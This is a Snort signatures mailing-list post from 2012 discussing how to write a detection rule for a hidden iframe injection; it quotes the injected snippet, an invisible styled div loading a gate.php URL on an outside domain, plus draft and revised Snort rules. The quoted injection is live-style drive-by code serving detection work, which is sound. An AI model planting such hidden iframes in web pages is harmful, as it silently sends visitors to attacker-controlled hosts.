[Snort-sigs] Rule thought

lists at ...3397... lists at ...3397...
Mon Aug 6 14:27:25 EDT 2012

On 08/06/12 13:13, James Lay wrote:
> All,
> Recently (today) I ran into the below:
> <!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div 
> class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=1003673   
> frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 
> border=0></iframe></div><!--/qpi-->
> I've not seen an iframe injection that included a specified class 
> before.  My original draft rule looked like:
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any 
> (msg:"INDICATOR-COMPROMISE div class iframe in page"; file_data; 
> pcre:"/<\/style><div class=[a-z]{9}><iframe src/i"; 
> classtype:web-application-attack; sid:10000017; rev:1;)
> But this looks pretty expensive.  I'm sure there's a better way to 
> match this...would it be something like:
> content:"</style><div"; pcre:"/class=[a-z]{9}>/"; content:"<iframe 
> src";
> My question is how do I tell Snort to match all three consecutively?  I 
> get that I could use within, but would that apply to the pcre?  Thanks 
> for any advice.

I think there's more of an abnormality around the unquoted URL in the iframe and
I'm not certain the class will always be 9 characters, but assuming it is how about:

div tag with class preceding iframe to specific URL"; flow:from_server,
established; file_data; content:"<div class="; content:"<iframe src=http:";
fast_pattern; within:30; pcre:"/<div class=[a-z]{9}><iframe
src=http[^\x3e]+\.php\?[a-z]=\d+\x20/"; classtype:bad-unknown; sid:x; rev:1;)

Just a thought...  Joel will probably want to add /smi ;)

More information about the Snort-sigs mailing list